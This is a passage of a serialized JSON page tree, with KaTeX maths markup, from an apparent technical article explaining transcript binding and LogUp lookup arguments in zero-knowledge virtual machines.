4789},[261],[],{"type":26,"tag":137,"props":115517,"children":115519},{"className":115518,"style":621},[169,170],[115520],{"type":32,"value":624},{"type":26,"tag":137,"props":115522,"children":115523},{"style":114784},[115524,115528],{"type":26,"tag":137,"props":115525,"children":115527},{"className":115526,"style":114789},[261],[],{"type":26,"tag":137,"props":115529,"children":115531},{"className":115530,"style":114877},[114807],[115532],{"type":26,"tag":137,"props":115533,"children":115535},{"className":115534,"style":114883},[114882],[115536],{"type":26,"tag":36869,"props":115537,"children":115538},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115539],{"type":26,"tag":114895,"props":115540,"children":115541},{"d":114897},[],{"type":26,"tag":137,"props":115543,"children":115545},{"className":115544},[197],[115546],{"type":32,"value":200},{"type":32,"value":115548}," are constants, so ",{"type":26,"tag":130,"props":115550,"children":115552},{"className":115551},[133,134],[115553],{"type":26,"tag":137,"props":115554,"children":115556},{"className":115555},[140],[115557],{"type":26,"tag":137,"props":115558,"children":115560},{"className":115559,"ariaHidden":146},[145],[115561],{"type":26,"tag":137,"props":115562,"children":115564},{"className":115563},[151],[115565,115569,115629,115634,115683],{"type":26,"tag":137,"props":115566,"children":115568},{"className":115567,"style":114762},[156],[],{"type":26,"tag":137,"props":115570,"children":115572},{"className":115571},[169,114767],[115573],{"type":26,"tag":137,"props":115574,"children":115576},{"className":115575},[241,417],[115577,115618],{"type":26,"tag":137,"props":115578,"children":115580},{"className":115579},[246],[115581,115613],{"type":26,"tag":137,"props":115582,"children":115584},{"className":115583,"style":114780},[251],[115585,115597],{"type":26,"tag":137,"props":115586,"children":115587},{"style":114784},[115588,115592],{"type":26,"tag":137,"props":115589,"children":115591},{"className":115590,"style":114789},[261],[],{"type":26,"tag":137,"props":115593,"children":115595},{"className":115594,"style":1039},[169,170],[115596],{"type":32,"value":1042},{"type":26,"tag":137,"props":115598,"children":115599},{"style":114798},[115600,115604],{"type":26,"tag":137,"props":115601,"children":115603},{"className":115602,"style":114789},[261],[],{"type":26,"tag":137,"props":115605,"children":115607},{"className":115606,"style":114808},[114807],[115608],{"type":26,"tag":137,"props":115609,"children":115611},{"className":115610},[169],[115612],{"type":32,"value":114815},{"type":26,"tag":137,"props":115614,"children":115616},{"className":115615},[453],[115617],{"type":32,"value":456},{"type":26,"tag":137,"props":115619,"children":115621},{"className":115620},[246],[115622],{"type":26,"tag":137,"props":115623,"children":115625},{"className":115624,"style":114828},[251],[115626],{"type":26,"tag":137,"props":115627,"children":115628},{},[],{"type":26,"tag":137,"props":115630,"children":115632},{"className":115631},[162],[115633],{"type":32,"value":165},{"type":26,"tag":137,"props":115635,"children":115637},{"className":115636},[169,114767],[115638],{"type":26,"tag":137,"props":115639,"children":115641},{"className":115640},[241],[115642],{"type":26,"tag":137,"props":115643,"children":115645},{"className":115644},[246],[115646],{"type":26,"tag":137,"props":115647,"children":115649},{"className":115648,"style":114853},[251],[115650,115662],{"type":26,"tag":137,"props":115651,"children":115652},{"style":114784},[115653,115657],{"type":26,"tag":137,"props":115654,"children":115656},{"className":115655,"style":114789},[261],[],{"type":26,"tag":137,"props":115658,"children":115660},{"className":115659,"style":621},[169,170],[115661],{"type":32,"value":624},{"type":26,"tag":137,"props":115663,"children":115664},{"style":114784},[115665,115669],{"type":26,"tag":137,"props":115666,"children":115668},{"className":115667,"style":114789},[261],[],{"type":26,"tag":137,"props":115670,"children":115672},{"className":115671,"style":114877},[114807],[115673],{"type":26,"tag":137,"props":115674,"children":115676},{"className":115675,"style":114883},[114882],[115677],{"type":26,"tag":36869,"props":115678,"children":115679},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115680],{"type":26,"tag":114895,"props":115681,"children":115682},{"d":114897},[],{"type":26,"tag":137,"props":115684,"children":115686},{"className":115685},[197],[115687],{"type":32,"value":200},{"type":32,"value":115689}," is linear in the table values ",{"type":26,"tag":130,"props":115691,"children":115693},{"className":115692},[133,134],[115694],{"type":26,"tag":137,"props":115695,"children":115697},{"className":115696},[140],[115698],{"type":26,"tag":137,"props":115699,"children":115701},{"className":115700,"ariaHidden":146},[145],[115702],{"type":26,"tag":137,"props":115703,"children":115705},{"className":115704},[151],[115706,115710,115715,115720,115769],{"type":26,"tag":137,"props":115707,"children":115709},{"className":115708,"style":115196},[156],[],{"type":26,"tag":137,"props":115711,"children":115713},{"className":115712,"style":1039},[169,170],[115714],{"type":32,"value":1042},{"type":26,"tag":137,"props":115716,"children":115718},{"className":115717},[162],[115719],{"type":32,"value":165},{"type":26,"tag":137,"props":115721,"children":115723},{"className":115722},[169,114767],[115724],{"type":26,"tag":137,"props":115725,"children":115727},{"className":115726},[241],[115728],{"type":26,"tag":137,"props":115729,"children":115731},{"className":115730},[246],[115732],{"type":26,"tag":137,"props":115733,"children":115735},{"className":115734,"style":114983},[251],[115736,115748],{"type":26,"tag":137,"props":115737,"children":115738},{"style":114784},[115739,115743],{"type":26,"tag":137,"props":115740,"children":115742},{"className":115741,"style":114789},[261],[],{"type":26,"tag":137,"props":115744,"children":115746},{"className":115745},[169,170],[115747],{"type":32,"value":2832},{"type":26,"tag":137,"props":115749,"children":115750},{"style":115151},[115751,115755],{"type":26,"tag":137,"props":115752,"children":115754},{"className":115753,"style":114789},[261],[],{"type":26,"tag":137,"props":115756,"children":115758},{"className":115757,"style":115010},[114807],[115759],{"type":26,"tag":137,"props":115760,"children":115762},{"className":115761,"style":114883},[114882],[115763],{"type":26,"tag":36869,"props":115764,"children":115765},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115766],{"type":26,"tag":114895,"props":115767,"children":115768},{"d":114897},[],{"type":26,"tag":137,"props":115770,"children":115772},{"className":115771},[197],[115773],{"type":32,"value":200},{"type":32,"value":470},{"type":26,"tag":35,"props":115776,"children":115777},{},[115778,115780,115849],{"type":32,"value":115779},"That linearity is exactly why missing transcript binding is dangerous: if ",{"type":26,"tag":130,"props":115781,"children":115783},{"className":115782},[133,134],[115784],{"type":26,"tag":137,"props":115785,"children":115787},{"className":115786},[140],[115788],{"type":26,"tag":137,"props":115789,"children":115791},{"className":115790,"ariaHidden":146},[145],[115792],{"type":26,"tag":137,"props":115793,"children":115795},{"className":115794},[151],[115796,115800],{"type":26,"tag":137,"props":115797,"children":115799},{"className":115798,"style":114853},[156],[],{"type":26,"tag":137,"props":115801,"children":115803},{"className":115802},[169,114767],[115804],{"type":26,"tag":137,"props":115805,"children":115807},{"className":115806},[241],[115808],{"type":26,"tag":137,"props":115809,"children":115811},{"className":115810},[246],[115812],{"type":26,"tag":137,"props":115813,"children":115815},{"className":115814,"style":114853},[251],[115816,115828],{"type":26,"tag":137,"props":115817,"children":115818},{"style":114784},[115819,115823],{"type":26,"tag":137,"props":115820,"children":115822},{"className":115821,"style":114789},[261],[],{"type":26,"tag":137,"props":115824,"children":115826},{"className":115825,"style":621},[169,170],[115827],{"type":32,"value":624},{"type":26,"tag":137,"props":115829,"children":115830},{"style":114784},[115831,115835],{"type":26,"tag":137,"props":115832,"children":115834},{"className":115833,"style":114789},[261],[],{"type":26,"tag":137,"props":115836,"children":115838},{"className":115837,"style":114877},[114807],[115839],{"type":26,"tag":137,"props":115840,"children":115842},{"className":115841,"style":114883},[114882],[115843],{"type":26,"tag":36869,"props":115844,"children":115845},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[115846],{"type":26,"tag":114895,"props":115847,"children":115848},{"d":114897},[],{"type":32,"value":115850}," is sampled before those values are bound, an attacker can reprogram values while preserving the same evaluated claim.",{"type":26,"tag":118,"props":115852,"children":115854},{"id":115853},"lookup-arguments-logup",[115855],{"type":32,"value":115856},"Lookup Arguments (LogUp)",{"type":26,"tag":35,"props":115858,"children":115859},{},[115860],{"type":32,"value":115861},"zkVMs need to check that values satisfy certain properties. For example:",{"type":26,"tag":3426,"props":115863,"children":115864},{},[115865,115921,115926],{"type":26,"tag":3430,"props":115866,"children":115867},{},[115868,115870,115920],{"type":32,"value":115869},"Is this byte in range ",{"type":26,"tag":130,"props":115871,"children":115873},{"className":115872},[133,134],[115874],{"type":26,"tag":137,"props":115875,"children":115877},{"className":115876},[140],[115878],{"type":26,"tag":137,"props":115879,"children":115881},{"className":115880,"ariaHidden":146},[145],[115882],{"type":26,"tag":137,"props":115883,"children":115885},{"className":115884},[151],[115886,115890,115895,115900,115905,115909,115915],{"type":26,"tag":137,"props":115887,"children":115889},{"className":115888,"style":157},[156],[],{"type":26,"tag":137,"props":115891,"children":115893},{"className":115892},[162],[115894],{"type":32,"value":3016},{"type":26,"tag":137,"props":115896,"children":115898},{"className":115897},[169],[115899],{"type":32,"value":1817},{"type":26,"tag":137,"props":115901,"children":115903},{"className":115902},[177],[115904],{"type":32,"value":180},{"type":26,"tag":137,"props":115906,"children":115908},{"className":115907,"style":185},[184],[],{"type":26,"tag":137,"props":115910,"children":115912},{"className":115911},[169],[115913],{"type":32,"value":115914},"255",{"type":26,"tag":137,"props":115916,"children":115918},{"className":115917},[197],[115919],{"type":32,"value":3079},{"type":32,"value":5737},{"type":26,"tag":3430,"props":115922,"children":115923},{},[115924],{"type":32,"value":115925},"Does this opcode decode correctly?",{"type":26,"tag":3430,"props":115927,"children":115928},{},[115929],{"type":32,"value":115930},"Is this memory access consistent with previous accesses?",{"type":26,"tag":35,"props":115932,"children":115933},{},[115934,115939],{"type":26,"tag":84,"props":115935,"children":115936},{},[115937],{"type":32,"value":115938},"The naive approach:",{"type":32,"value":115940}," Add constraints for each check. Expensive.",{"type":26,"tag":35,"props":115942,"children":115943},{},[115944,115949,115951,115956],{"type":26,"tag":84,"props":115945,"children":115946},{},[115947],{"type":32,"value":115948},"The clever approach:",{"type":32,"value":115950}," Precompute a table of valid tuples. Prove that every value the program uses appears in the table. This is a ",{"type":26,"tag":84,"props":115952,"children":115953},{},[115954],{"type":32,"value":115955},"multiset membership",{"type":32,"value":70397},{"type":26,"tag":35,"props":115958,"children":115959},{},[115960,115965],{"type":26,"tag":84,"props":115961,"children":115962},{},[115963],{"type":32,"value":115964},"LogUp (Logarithmic Derivative):",{"type":32,"value":115966}," Encode multiset membership as a sum of fractions.",{"type":26,"tag":35,"props":115968,"children":115969},{},[115970,115972,115997,115999,116026],{"type":32,"value":115971},"If set ",{"type":26,"tag":130,"props":115973,"children":115975},{"className":115974},[133,134],[115976],{"type":26,"tag":137,"props":115977,"children":115979},{"className":115978},[140],[115980],{"type":26,"tag":137,"props":115981,"children":115983},{"className":115982,"ariaHidden":146},[145],[115984],{"type":26,"tag":137,"props":115985,"children":115987},{"className":115986},[151],[115988,115992],{"type":26,"tag":137,"props":115989,"children":115991},{"className":115990,"style":1512},[156],[],{"type":26,"tag":137,"props":115993,"children":115995},{"className":115994},[169,170],[115996],{"type":32,"value":79370},{"type":32,"value":115998}," should equal set ",{"type":26,"tag":130,"props":116000,"children":116002},{"className":116001},[133,134],[116003],{"type":26,"tag":137,"props":116004,"children":116006},{"className":116005},[140],[116007],{"type":26,"tag":137,"props":116008,"children":116010},{"className":116009,"ariaHidden":146},[145],[116011],{"type":26,"tag":137,"props":116012,"children":116014},{"className":116013},[151],[116015,116019],{"type":26,"tag":137,"props":116016,"children":116018},{"className":116017,"style":1512},[156],[],{"type":26,"tag":137,"props":116020,"children":116023},{"className":116021,"style":116022},[169,170],"margin-right:0.05017em;",[116024],{"type":32,"value":116025},"B",{"type":32,"value":116027}," as multisets:",{"type":26,"tag":35,"props":116029,"children":116030},{},[116031],{"type":26,"tag":130,"props":116032,"children":116034},{"className":116033},[133,134],[116035],{"type":26,"tag":137,"props":116036,"children":116038},{"className":116037},[140],[116039],{"type":26,"tag":137,"props":116040,"children":116042},{"className":116041,"ariaHidden":146},[145],[116043,116256],{"type":26,"tag":137,"props":116044,"children":116046},{"className":116045},[151],[116047,116052,116125,116129,116243,116247,116252],{"type":26,"tag":137,"props":116048,"children":116051},{"className":116049,"style":116050},[156],"height:1.2484em;vertical-align:-0.4033em;",[],{"type":26,"tag":137,"props":116053,"children":116055},{"className":116054},[3722],[116056,116061],{"type":26,"tag":137,"props":116057,"children":116059},{"className":116058,"style":3725},[3722,3723,3724],[116060],{"type":32,"value":3728},{"type":26,"tag":137,"props":116062,"children":116064},{"className":116063},[236],[116065],{"type":26,"tag":137,"props":116066,"children":116068},{"className":116067},[241,417],[116069,116113],{"type":26,"tag":137,"props":116070,"children":116072},{"className":116071},[246],[116073,116108],{"type":26,"tag":137,"props":116074,"children":116077},{"className":116075,"style":116076},[251],"height:0.1786em;",[116078],{"type":26,"tag":137,"props":116079,"children":116080},{"style":24239},[116081,116085],{"type":26,"tag":137,"props":116082,"children":116084},{"className":116083,"style":262},[261],[],{"type":26,"tag":137,"props":116086,"children":116088},{"className":116087},[267,268,269,270],[116089],{"type":26,"tag":137,"props":116090,"children":116092},{"className":116091},[169,270],[116093,116098,116103],{"type":26,"tag":137,"props":116094,"children":116096},{"className":116095},[169,170,270],[116097],{"type":32,"value":41},{"type":26,"tag":137,"props":116099,"children":116101},{"className":116100},[286,270],[116102],{"type":32,"value":24279},{"type":26,"tag":137,"props":116104,"children":116106},{"className":116105},[169,170,270],[116107],{"type":32,"value":79370},{"type":26,"tag":137,"props":116109,"children":116111},{"className":116110},[453],[116112],{"type":32,"value":456},{"type":26,"tag":137,"props":116114,"children":116116},{"className":116115},[246],[116117],{"type":26,"tag":137,"props":116118,"children":116121},{"className":116119,"style":116120},[251],"height:0.3271em;",[116122],{"type":26,"tag":137,"props":116123,"children":116124},{},[],{"type":26,"tag":137,"props":116126,"children":116128},{"className":116127,"style":185},[184],[],{"type":26,"tag":137,"props":116130,"children":116132},{"className":116131},[169],[116133,116138,116239],{"type":26,"tag":137,"props":116134,"children":116137},{"className":116135},[162,116136],"nulldelimiter",[],{"type":26,"tag":137,"props":116139,"children":116142},{"className":116140},[116141],"mfrac",[116143],{"type":26,"tag":137,"props":116144,"children":116146},{"className":116145},[241,417],[116147,116227],{"type":26,"tag":137,"props":116148,"children":116150},{"className":116149},[246],[116151,116222],{"type":26,"tag":137,"props":116152,"children":116155},{"className":116153,"style":116154},[251],"height:0.8451em;",[116156,116187,116201],{"type":26,"tag":137,"props":116157,"children":116159},{"style":116158},"top:-2.655em;",[116160,116164],{"type":26,"tag":137,"props":116161,"children":116163},{"className":116162,"style":114789},[261],[],{"type":26,"tag":137,"props":116165,"children":116167},{"className":116166},[267,268,269,270],[116168],{"type":26,"tag":137,"props":116169,"children":116171},{"className":116170},[169,270],[116172,116177,116182],{"type":26,"tag":137,"props":116173,"children":116175},{"className":116174,"style":2321},[169,170,270],[116176],{"type":32,"value":2324},{"type":26,"tag":137,"props":116178,"children":116180},{"className":116179},[353,270],[116181],{"type":32,"value":1935},{"type":26,"tag":137,"props":116183,"children":116185},{"className":116184},[169,170,270],[116186],{"type":32,"value":41},{"type":26,"tag":137,"props":116188,"children":116190},{"style":116189},"top:-3.23em;",[116191,116195],{"type":26,"tag":137,"props":116192,"children":116194},{"className":116193,"style":114789},[261],[],{"type":26,"tag":137,"props":116196,"children":116200},{"className":116197,"style":116199},[116198],"frac-line","border-bottom-width:0.04em;",[],{"type":26,"tag":137,"props":116202,"children":116204},{"style":116203},"top:-3.394em;",[116205,116209],{"type":26,"tag":137,"props":116206,"children":116208},{"className":116207,"style":114789},[261],[],{"type":26,"tag":137,"props":116210,"children":116212},{"className":116211},[267,268,269,270],[116213],{"type":26,"tag":137,"props":116214,"children":116216},{"className":116215},[169,270],[116217],{"type":26,"tag":137,"props":116218,"children":116220},{"className":116219},[169,270],[116221],{"type":32,"value":878},{"type":26,"tag":137,"props":116223,"children":116225},{"className":116224},[453],[116226],{"type":32,"value":456},{"type":26,"tag":137,"props":116228,"children":116230},{"className":116229},[246],[116231],{"type":26,"tag":137,"props":116232,"children":116235},{"className":116233,"style":116234},[251],"height:0.4033em;",[116236],{"type":26,"tag":137,"props":116237,"children":116238},{},[],{"type":26,"tag":137,"props":116240,"children":116242},{"className":116241},[197,116136],[],{"type":26,"tag":137,"props":116244,"children":116246},{"className":116245,"style":281},[184],[],{"type":26,"tag":137,"props":116248,"children":116250},{"className":116249},[286],[116251],{"type":32,"value":289},{"type":26,"tag":137,"props":116253,"children":116255},{"className":116254,"style":281},[184],[],{"type":26,"tag":137,"props":116257,"children":116259},{"className":116258},[151],[116260,116264,116336,116340],{"type":26,"tag":137,"props":116261,"children":116263},{"className":116262,"style":116050},[156],[],{"type":26,"tag":137,"props":116265,"children":116267},{"className":116266},[3722],[116268,116273],{"type":26,"tag":137,"props":116269,"children":116271},{"className":116270,"style":3725},[3722,3723,3724],[116272],{"type":32,"value":3728},{"type":26,"tag":137,"props":116274,"children":116276},{"className":116275},[236],[116277],{"type":26,"tag":137,"props":116278,"children":116280},{"className":116279},[241,417],[116281,116325],{"type":26,"tag":137,"props":116282,"children":116284},{"className":116283},[246],[116285,116320],{"type":26,"tag":137,"props":116286,"children":116289},{"className":116287,"style":116288},[251],"height:0.1864em;",[116290],{"type":26,"tag":137,"props":116291,"children":116292},{"style":24239},[116293,116297],{"type":26,"tag":137,"props":116294,"children":116296},{"className":116295,"style":262},[261],[],{"type":26,"tag":137,"props":116298,"children":116300},{"className":116299},[267,268,269,270],[116301],{"type":26,"tag":137,"props":116302,"children":116304},{"className":116303},[169,270],[116305,116310,116315],{"type":26,"tag":137,"props":116306,"children":116308},{"className":116307},[169,170,270],[116309],{"type":32,"value":2832},{"type":26,"tag":137,"props":116311,"children":116313},{"className":116312},[286,270],[116314],{"type":32,"value":24279},{"type":26,"tag":137,"props":116316,"children":116318},{"className":116317,"style":116022},[169,170,270],[116319],{"type":32,"value":116025},{"type":26,"tag":137,"props":116321,"children":116323},{"className":116322},[453],[116324],{"type":32,"value":456},{"type":26,"tag":137,"props":116326,"children":116328},{"className":116327},[246],[116329],{"type":26,"tag":137,"props":116330,"children":116332},{"className":116331,"style":116120},[251],[116333],{"type":26,"tag":137,"props":116334,"children":116335},{},[],{"type":26,"tag":137,"props":116337,"children":116339},{"className":116338,"style":185},[184],[],{"type":26,"tag":137,"props":116341,"children":116343},{"className":116342},[169],[116344,116348,116441],{"type":26,"tag":137,"props":116345,"children":116347},{"className":116346},[162,116136],[],{"type":26,"tag":137,"props":116349,"children":116351},{"className":116350},[116141],[116352],{"type":26,"tag":137,"props":116353,"children":116355},{"className":116354},[241,417],[116356,116430],{"type":26,"tag":137,"props":116357,"children":116359},{"className":116358},[246],[116360,116425],{"type":26,"tag":137,"props":116361,"children":116363},{"className":116362,"style":116154},[251],[116364,116394,116405],{"type":26,"tag":137,"props":116365,"children":116366},{"style":116158},[116367,116371],{"type":26,"tag":137,"props":116368,"children":116370},{"className":116369,"style":114789},[261],[],{"type":26,"tag":137,"props":116372,"children":116374},{"className":116373},[267,268,269,270],[116375],{"type":26,"tag":137,"props":116376,"children":116378},{"className":116377},[169,270],[116379,116384,116389],{"type":26,"tag":137,"props":116380,"children":116382},{"className":116381,"style":2321},[169,170,270],[116383],{"type":32,"value":2324},{"type":26,"tag":137,"props":116385,"children":116387},{"className":116386},[353,270],[116388],{"type":32,"value":1935},{"type":26,"tag":137,"props":116390,"children":116392},{"className":116391},[169,170,270],[116393],{"type":32,"value":2832},{"type":26,"tag":137,"props":116395,"children":116396},{"style":116189},[116397,116401],{"type":26,"tag":137,"props":116398,"children":116400},{"className":116399,"style":114789},[261],[],{"type":26,"tag":137,"props":116402,"children":116404},{"className":116403,"style":116199},[116198],[],{"type":26,"tag":137,"props":116406,"children":116407},{"style":116203},[116408,116412],{"type":26,"tag":137,"props":116409,"children":116411},{"className":116410,"style":114789},[261],[],{"type":26,"tag":137,"props":116413,"children":116415},{"className":116414},[267,268,269,270],[116416],{"type":26,"tag":137,"props":116417,"children":116419},{"className":116418},[169,270],[116420],{"type":26,"tag":137,"props":116421,"children":116423},{"className":116422},[169,270],[116424],{"type":32,"value":878},{"type":26,"tag":137,"props":116426,"children":116428},{"className":116427},[453],[116429],{"type":32,"value":456},{"type":26,"tag":137,"props":116431,"children":116433},{"className":116432},[246],[116434],{"type":26,"tag":137,"props":116435,"children":116437},{"className":116436,"style":116234},[251],[116438],{"type":26,"tag":137,"props":116439,"children":116440},{},[],{"type":26,"tag":137,"props":116442,"children":116444},{"className":116443},[197,116136],[],{"type":26,"tag":35,"props":116446,"children":116447},{},[116448,116450,116475],{"type":32,"value":116449},"for random challenge ",{"type":26,"tag":130,"props":116451,"children":116453},{"className":116452},[133,134],[116454],{"type":26,"tag":137,"props":116455,"children":116457},{"className":116456},[140],[116458],{"type":26,"tag":137,"props":116459,"children":116461},{"className":116460,"ariaHidden":146},[145],[116462],{"type":26,"tag":137,"props":116463,"children":116465},{"className":116464},[151],[116466,116470],{"type":26,"tag":137,"props":116467,"children":116469},{"className":116468,"style":1542},[156],[],{"type":26,"tag":137,"props":116471,"children":116473},{"className":116472,"style":2321},[169,170],[116474],{"type":32,"value":2324},{"type":32,"value":116476},". If the multisets match, the sums are equal. If they differ, the sums differ with overwhelming probability.",{"type":26,"tag":35,"props":116478,"children":116479},{},[116480,116485],{"type":26,"tag":84,"props":116481,"children":116482},{},[116483],{"type":32,"value":116484},"In zkVMs:",{"type":32,"value":116486}," Different components emit and consume lookup tuples:",{"type":26,"tag":3426,"props":116488,"children":116489},{},[116490,116576],{"type":26,"tag":3430,"props":116491,"children":116492},{},[116493,116495,116520,116522,116547,116549,116575],{"type":32,"value":116494},"CPU emits: \"I read value ",{"type":26,"tag":130,"props":116496,"children":116498},{"className":116497},[133,134],[116499],{"type":26,"tag":137,"props":116500,"children":116502},{"className":116501},[140],[116503],{"type":26,"tag":137,"props":116504,"children":116506},{"className":116505,"ariaHidden":146},[145],[116507],{"type":26,"tag":137,"props":116508,"children":116510},{"className":116509},[151],[116511,116515],{"type":26,"tag":137,"props":116512,"children":116514},{"className":116513,"style":1542},[156],[],{"type":26,"tag":137,"props":116516,"children":116518},{"className":116517,"style":190},[169,170],[116519],{"type":32,"value":5148},{"type":32,"value":116521}," from address ",{"type":26,"tag":130,"props":116523,"children":116525},{"className":116524},[133,134],[116526],{"type":26,"tag":137,"props":116527,"children":116529},{"className":116528},[140],[116530],{"type":26,"tag":137,"props":116531,"children":116533},{"className":116532,"ariaHidden":146},[145],[116534],{"type":26,"tag":137,"props":116535,"children":116537},{"className":116536},[151],[116538,116542],{"type":26,"tag":137,"props":116539,"children":116541},{"className":116540,"style":1542},[156],[],{"type":26,"tag":137,"props":116543,"children":116545},{"className":116544},[169,170],[116546],{"type":32,"value":41},{"type":32,"value":116548}," at time ",{"type":26,"tag":130,"props":116550,"children":116552},{"className":116551},[133,134],[116553],{"type":26,"tag":137,"props":116554,"children":116556},{"className":116555},[140],[116557],{"type":26,"tag":137,"props":116558,"children":116560},{"className":116559,"ariaHidden":146},[145],[116561],{"type":26,"tag":137,"props":116562,"children":116564},{"className":116563},[151],[116565,116570],{"type":26,"tag":137,"props":116566,"children":116569},{"className":116567,"style":116568},[156],"height:0.6151em;",[],{"type":26,"tag":137,"props":116571,"children":116573},{"className":116572},[169,170],[116574],{"type":32,"value":24313},{"type":32,"value":22653},{"type":26,"tag":3430,"props":116577,"children":116578},{},[116579,116581,116606,116608,116633,116635,116660],{"type":32,"value":116580},"Memory table consumes: \"At time ",{"type":26,"tag":130,"props":116582,"children":116584},{"className":116583},[133,134],[116585],{"type":26,"tag":137,"props":116586,"children":116588},{"className":116587},[140],[116589],{"type":26,"tag":137,"props":116590,"children":116592},{"className":116591,"ariaHidden":146},[145],[116593],{"type":26,"tag":137,"props":116594,"children":116596},{"className":116595},[151],[116597,116601],{"type":26,"tag":137,"props":116598,"children":116600},{"className":116599,"style":116568},[156],[],{"type":26,"tag":137,"props":116602,"children":116604},{"className":116603},[169,170],[116605],{"type":32,"value":24313},{"type":32,"value":116607},", address ",{"type":26,"tag":130,"props":116609,"children":116611},{"className":116610},[133,134],[116612],{"type":26,"tag":137,"props":116613,"children":116615},{"className":116614},[140],[116616],{"type":26,"tag":137,"props":116617,"children":116619},{"className":116618,"ariaHidden":146},[145],[116620],{"type":26,"tag":137,"props":116621,"children":116623},{"className":116622},[151],[116624,116628],{"type":26,"tag":137,"props":116625,"children":116627},{"className":116626,"style":1542},[156],[],{"type":26,"tag":137,"props":116629,"children":116631},{"className":116630},[169,170],[116632],{"type":32,"value":41},{"type":32,"value":116634}," contained ",{"type":26,"tag":130,"props":116636,"children":116638},{"className":116637},[133,134],[116639],{"type":26,"tag":137,"props":116640,"children":116642},{"className":116641},[140],[116643],{"type":26,"tag":137,"props":116644,"children":116646},{"className":116645,"ariaHidden":146},[145],[116647],{"type":26,"tag":137,"props":116648,"children":116650},{"className":116649},[151],[116651,116655],{"type":26,"tag":137,"props":116652,"children":116654},{"className":116653,"style":1542},[156],[],{"type":26,"tag":137,"props":116656,"children":116658},{"className":116657,"style":190},[169,170],[116659],{"type":32,"value":5148},{"type":32,"value":22653},{"type":26,"tag":35,"props":116662,"children":116663},{},[116664],{"type":32,"value":116665},"If everything balances, the execution is consistent.",{"type":26,"tag":35,"props":116667,"children":116668},{},[116669,116674],{"type":26,"tag":84,"props":116670,"children":116671},{},[116672],{"type":32,"value":116673},"The claimed_sum:",{"type":32,"value":116675}," Each component computes its contribution to the LogUp sum:",{"type":26,"tag":35,"props":116677,"children":116678},{},[116679],{"type":26,"tag":130,"props":116680,"children":116682},{"className":116681},[133,134],[116683],{"type":26,"tag":137,"props":116684,"children":116686},{"className":116685},[140],[116687],{"type":26,"tag":137,"props":116688,"children":116690},{"className":116689,"ariaHidden":146},[145],[116691,116789,117040],{"type":26,"tag":137,"props":116692,"children":116694},{"className":116693},[151],[116695,116699,116709,116714,116776,116780,116785],{"type":26,"tag":137,"props":116696,"children":116698},{"className":116697,"style":97046},[156],[],{"type":26,"tag":137,"props":116700,"children":116702},{"className":116701},[169,32],[116703],{"type":26,"tag":137,"props":116704,"children":116706},{"className":116705},[169],[116707],{"type":32,"value":116708},"claimed",{"type":26,"tag":137,"props":116710,"children":116712},{"className":116711,"style":621},[169],[116713],{"type":32,"value":5666},{"type":26,"tag":137,"props":116715,"children":116717},{"className":116716},[169],[116718,116727],{"type":26,"tag":137,"props":116719,"children":116721},{"className":116720},[169,32],[116722],{"type":26,"tag":137,"props":116723,"children":116725},{"className":116724},[169],[116726],{"type":32,"value":79235},{"type":26,"tag":137,"props":116728,"children":116730},{"className":116729},[236],[116731],{"type":26,"tag":137,"props":116732,"children":116734},{"className":116733},[241,417],[116735,116765],{"type":26,"tag":137,"props":116736,"children":116738},{"className":116737},[246],[116739,116760],{"type":26,"tag":137,"props":116740,"children":116742},{"className":116741,"style":556},[251],[116743],{"type":26,"tag":137,"props":116744,"children":116746},{"style":116745},"top:-2.55em;margin-right:0.05em;",[116747,116751],{"type":26,"tag":137,"props":116748,"children":116750},{"className":116749,"style":262},[261],[],{"type":26,"tag":137,"props":116752,"children":116754},{"className":116753},[267,268,269,270],[116755],{"type":26,"tag":137,"props":116756,"children":116758},{"className":116757},[169,170,270],[116759],{"type":32,"value":506},{"type":26,"tag":137,"props":116761,"children":116763},{"className":116762},[453],[116764],{"type":32,"value":456},{"type":26,"tag":137,"props":116766,"children":116768},{"className":116767},[246],[116769],{"type":26,"tag":137,"props":116770,"children":116772},{"className":116771,"style":464},[251],[116773],{"type":26,"tag":137,"props":116774,"children":116775},{},[],{"type":26,"tag":137,"props":116777,"children":116779},{"className":116778,"style":281},[184],[],{"type":26,"tag":137,"props":116781,"children":116783},{"className":116782},[286],[116784],{"type":32,"value":289},{"type":26,"tag":137,"props":116786,"children":116788},{"className":116787,"style":281},[184],[],{"type":26,"tag":137,"props":116790,"children":116792},{"className":116791},[151],[116793,116798,116858,116862,117027,117031,117036],{"type":26,"tag":137,"props":116794,"children":116797},{"className":116795,"style":116796},[156],"height:1.3874em;vertical-align:-0.5423em;",[],{"type":26,"tag":137,"props":116799,"children":116801},{"className":116800},[3722],[116802,116807],{"type":26,"tag":137,"props":116803,"children":116805},{"className":116804,"style":3725},[3722,3723,3724],[116806],{"type":32,"value":3728},{"type":26,"tag":137,"props":116808,"children":116810},{"className":116809},[236],[116811],{"type":26,"tag":137,"props":116812,"children":116814},{"className":116813},[241,417],[116815,116846],{"type":26,"tag":137,"props":116816,"children":116818},{"className":116817},[246],[116819,116841],{"type":26,"tag":137,"props":116820,"children":116823},{"className":116821,"style":116822},[251],"height:0.162em;",[116824],{"type":26,"tag":137,"props":116825,"children":116826},{"style":24239},[116827,116831],{"type":26,"tag":137,"props":116828,"children":116830},{"className":116829,"style":262},[261],[],{"type":26,"tag":137,"props":116832,"children":116834},{"className":116833},[267,268,269,270],[116835],{"type":26,"tag":137,"props":116836,"children":116839},{"className":116837,"style":116838},[169,170,270],"margin-right:0.05724em;",[116840],{"type":32,"value":11242},{"type":26,"tag":137,"props":116842,"children":116844},{"className":116843},[453],[116845],{"type":32,"value":456},{"type":26,"tag":137,"props":116847,"children":116849},{"className":116848},[246],[116850],{"type":26,"tag":137,"props":116851,"children":116854},{"className":116852,"style":116853},[251],"height:0.4358em;",[116855],{"type":26,"tag":137,"props":116856,"children":116857},{},[],{"type":26,"tag":137,"props":116859,"children":116861},{"className":116860,"style":185},[184],[],{"type":26,"tag":137,"props":116863,"children":116865},{"className":116864},[169],[116866,116870,117023],{"type":26,"tag":137,"props":116867,"children":116869},{"className":116868},[162,116136],[],{"type":26,"tag":137,"props":116871,"children":116873},{"className":116872},[116141],[116874],{"type":26,"tag":137,"props":116875,"children":116877},{"className":116876},[241,417],[116878,117011],{"type":26,"tag":137,"props":116879,"children":116881},{